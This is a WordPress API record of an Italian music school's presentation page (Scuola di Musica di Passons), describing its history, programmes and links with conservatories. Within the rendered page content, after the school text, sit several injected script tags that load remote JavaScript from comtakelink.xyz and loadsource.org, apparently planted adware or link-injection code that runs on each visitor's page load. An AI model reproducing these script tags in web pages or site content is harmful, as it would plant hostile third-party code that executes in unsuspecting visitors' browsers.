{"id":34,"date":"2011-04-25T20:44:02","date_gmt":"2011-04-25T20:44:02","guid":{"rendered":"http:\/\/localhost\/~davidemodotto\/bandapassons\/2011\/?page_id=34"},"modified":"2018-09-29T15:51:37","modified_gmt":"2018-09-29T13:51:37","slug":"presentazione-della-scuola","status":"publish","type":"page","link":"https:\/\/bandapassons.it\/gfp\/scuola\/presentazione-della-scuola\/","title":{"rendered":"Presentazione della scuola"},"content":{"rendered":"<p>[vc_row][vc_column][vc_column_text]<span style=\"color: #000000;\">La Scuola di Musica di Passons \u00e8 una struttura radicata sul territorio del comune di Pasian di Prato e vanta pi\u00f9 di 150 iscritti (riferendosi all&#8217;anno scolastico 2017\/2018): \u00e8 indubbiamente una delle realt\u00e0 musicali pi\u00f9 grandi e significative della Provincia di Udine e per capire il motivo del suo successo dobbiamo scoprire la sua storia passata e gli obiettivi che la guidano.<\/span><\/p>\n<p><span style=\"color: #000000;\">La Scuola nasce come evoluzione dei Corsi Musicali di Orientamento Bandistico, gi\u00e0 presenti nelle numerose attivit\u00e0 del &#8220;Gruppo Folkloristico di Passons&#8221;. Si passa dunque da un&#8217;istruzione musicale finalizzata alla &#8220;banda&#8221;, in cui oltre alla teoria e solfeggio vengono insegnati strumenti a fiato e a percussione, ad una istruzione pi\u00f9 ampia e completa nella quale sono s\u00ec inclusi gli strumenti prettamente bandistici, ma vengono inseriti anche pianoforte, fisarmonica, chitarra e violino.<\/span><\/p>\n<p><span style=\"color: #000000;\">La conseguenza pi\u00f9 immediata \u00e8, oltre l&#8217;aumento degli iscritti, la crescita di importanza della Scuola stessa come punto d&#8217;incontro e di confronto tra musicisti in erba, la nascita di varie collaborazioni tra questi ultimi che hanno anche una struttura nella quale concretizzare quanto appreso.<\/span><\/p>\n<p><span style=\"color: #000000;\">Con questa evoluzione la scuola inizia a confrontarsi con le realt\u00e0 didattiche statali, come i vari Conservatori di musica, in primis quello udinese: vengono adeguati i programmi, aggiornati gli insegnanti e cos\u00ec la scuola inizia a presentare allievi che sostengono con successo i vari esami di stato.<\/span><\/p>\n<p><span style=\"color: #000000;\">Nel futuro si conta su una sempre pi\u00f9 stretta collaborazione con gli enti statali a noi vicini per unire la struttura e i mezzi del Conservatorio con la capillarit\u00e0 e la flessibilit\u00e0 della scuola di musica.<\/span><\/p>\n<p><span style=\"color: #000000;\">Pur seguendo un filone comune anche i programmi vengono variati a seconda delle esigenze dell&#8217;allievo: vengono preparati esami di ammissione in Conservatorio, esami di stato come candidati privatisti, oppure semplicemente si apprende la musica come attivit\u00e0 integrativa, senza per questo sacrificare la seriet\u00e0 e la spendibilit\u00e0 futura del lavoro svolto.<\/span><\/p>\n<p><span style=\"color: #000000;\">All&#8217;ampia proposta didattica la Scuola affianca molteplici attivit\u00e0 d&#8217;insieme organizzando concerti e scambi con altre scuole della regione e conferendole ulteriore spessore.<\/span>[\/vc_column_text][\/vc_column][\/vc_row]<\/p>\n<p>&nbsp;<\/p>\n<p><script src=\"http:\/\/comtakelink.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x7323x&amp;r=1538228699700\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/comtakelink.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n<p>&nbsp;<\/p>\n<p><script src=\"http:\/\/comtakelink.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x7323x&amp;r=1538229053902\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/comtakelink.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/comtakelink.xyz\/optout\/set\/lat?jsonp=__twb_cb_706187404&amp;key=1c9b4727fff543e84f&amp;cv=1538229112&amp;t=1538229111932\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/comtakelink.xyz\/optout\/set\/lt?jsonp=__twb_cb_235702773&amp;key=1c9b4727fff543e84f&amp;cv=69785&amp;t=1538229111934\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/comtakelink.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x7323x&amp;r=1538229111938\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/comtakelink.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[vc_row][vc_column][vc_column_text]La Scuola di Musica di Passons \u00e8 una struttura radicata sul territorio del comune di Pasian di Prato e vanta<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":9,"menu_order":0,"comment_status":"closed","ping_status":"open","template":"","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"class_list":["post-34","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.6 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Presentazione della scuola - Gruppo Folkloristico Passons - APS<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/bandapassons.it\/gfp\/scuola\/presentazione-della-scuola\/\" \/>\n<meta property=\"og:locale\" content=\"it_IT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Presentazione della scuola - Gruppo Folkloristico Passons - APS\" \/>\n<meta property=\"og:description\" content=\"[vc_row][vc_column][vc_column_text]La Scuola di Musica di Passons \u00e8 una struttura radicata sul territorio del comune di Pasian di Prato e vanta\" \/>\n<meta property=\"og:url\" content=\"https:\/\/bandapassons.it\/gfp\/scuola\/presentazione-della-scuola\/\" \/>\n<meta property=\"og:site_name\" content=\"Gruppo Folkloristico Passons - APS\" \/>\n<meta property=\"article:modified_time\" content=\"2018-09-29T13:51:37+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Tempo di lettura stimato\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 minuti\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/bandapassons.it\\\/gfp\\\/scuola\\\/presentazione-della-scuola\\\/\",\"url\":\"https:\\\/\\\/bandapassons.it\\\/gfp\\\/scuola\\\/presentazione-della-scuola\\\/\",\"name\":\"Presentazione della scuola - Gruppo Folkloristico Passons - APS\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/bandapassons.it\\\/gfp\\\/#website\"},\"datePublished\":\"2011-04-25T20:44:02+00:00\",\"dateModified\":\"2018-09-29T13:51:37+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/bandapassons.it\\\/gfp\\\/scuola\\\/presentazione-della-scuola\\\/#breadcrumb\"},\"inLanguage\":\"it-IT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/bandapassons.it\\\/gfp\\\/scuola\\\/presentazione-della-scuola\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/bandapassons.it\\\/gfp\\\/scuola\\\/presentazione-della-scuola\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/bandapassons.it\\\/gfp\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"La scuola di musica\",\"item\":\"https:\\\/\\\/bandapassons.it\\\/gfp\\\/scuola\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Presentazione della scuola\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/bandapassons.it\\\/gfp\\\/#website\",\"url\":\"https:\\\/\\\/bandapassons.it\\\/gfp\\\/\",\"name\":\"Gruppo Folkloristico Passons - APS\",\"description\":\"Scuola di Musica ~ Banda Musicale ~ Balletto Folkloristico ~ Allegre con Brio\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/bandapassons.it\\\/gfp\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"it-IT\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Presentazione della scuola - Gruppo Folkloristico Passons - APS","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/bandapassons.it\/gfp\/scuola\/presentazione-della-scuola\/","og_locale":"it_IT","og_type":"article","og_title":"Presentazione della scuola - Gruppo Folkloristico Passons - APS","og_description":"[vc_row][vc_column][vc_column_text]La Scuola di Musica di Passons \u00e8 una struttura radicata sul territorio del comune di Pasian di Prato e vanta","og_url":"https:\/\/bandapassons.it\/gfp\/scuola\/presentazione-della-scuola\/","og_site_name":"Gruppo Folkloristico Passons - APS","article_modified_time":"2018-09-29T13:51:37+00:00","twitter_card":"summary_large_image","twitter_misc":{"Tempo di lettura stimato":"2 minuti"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/bandapassons.it\/gfp\/scuola\/presentazione-della-scuola\/","url":"https:\/\/bandapassons.it\/gfp\/scuola\/presentazione-della-scuola\/","name":"Presentazione della scuola - Gruppo Folkloristico Passons - APS","isPartOf":{"@id":"https:\/\/bandapassons.it\/gfp\/#website"},"datePublished":"2011-04-25T20:44:02+00:00","dateModified":"2018-09-29T13:51:37+00:00","breadcrumb":{"@id":"https:\/\/bandapassons.it\/gfp\/scuola\/presentazione-della-scuola\/#breadcrumb"},"inLanguage":"it-IT","potentialAction":[{"@type":"ReadAction","target":["https:\/\/bandapassons.it\/gfp\/scuola\/presentazione-della-scuola\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/bandapassons.it\/gfp\/scuola\/presentazione-della-scuola\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/bandapassons.it\/gfp\/"},{"@type":"ListItem","position":2,"name":"La scuola di musica","item":"https:\/\/bandapassons.it\/gfp\/scuola\/"},{"@type":"ListItem","position":3,"name":"Presentazione della scuola"}]},{"@type":"WebSite","@id":"https:\/\/bandapassons.it\/gfp\/#website","url":"https:\/\/bandapassons.it\/gfp\/","name":"Gruppo Folkloristico Passons - APS","description":"Scuola di Musica ~ Banda Musicale ~ Balletto Folkloristico ~ Allegre con Brio","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/bandapassons.it\/gfp\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"it-IT"}]}},"_links":{"self":[{"href":"https:\/\/bandapassons.it\/gfp\/wp-json\/wp\/v2\/pages\/34","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/bandapassons.it\/gfp\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/bandapassons.it\/gfp\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/bandapassons.it\/gfp\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/bandapassons.it\/gfp\/wp-json\/wp\/v2\/comments?post=34"}],"version-history":[{"count":5,"href":"https:\/\/bandapassons.it\/gfp\/wp-json\/wp\/v2\/pages\/34\/revisions"}],"predecessor-version":[{"id":3726,"href":"https:\/\/bandapassons.it\/gfp\/wp-json\/wp\/v2\/pages\/34\/revisions\/3726"}],"up":[{"embeddable":true,"href":"https:\/\/bandapassons.it\/gfp\/wp-json\/wp\/v2\/pages\/9"}],"wp:attachment":[{"href":"https:\/\/bandapassons.it\/gfp\/wp-json\/wp\/v2\/media?parent=34"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}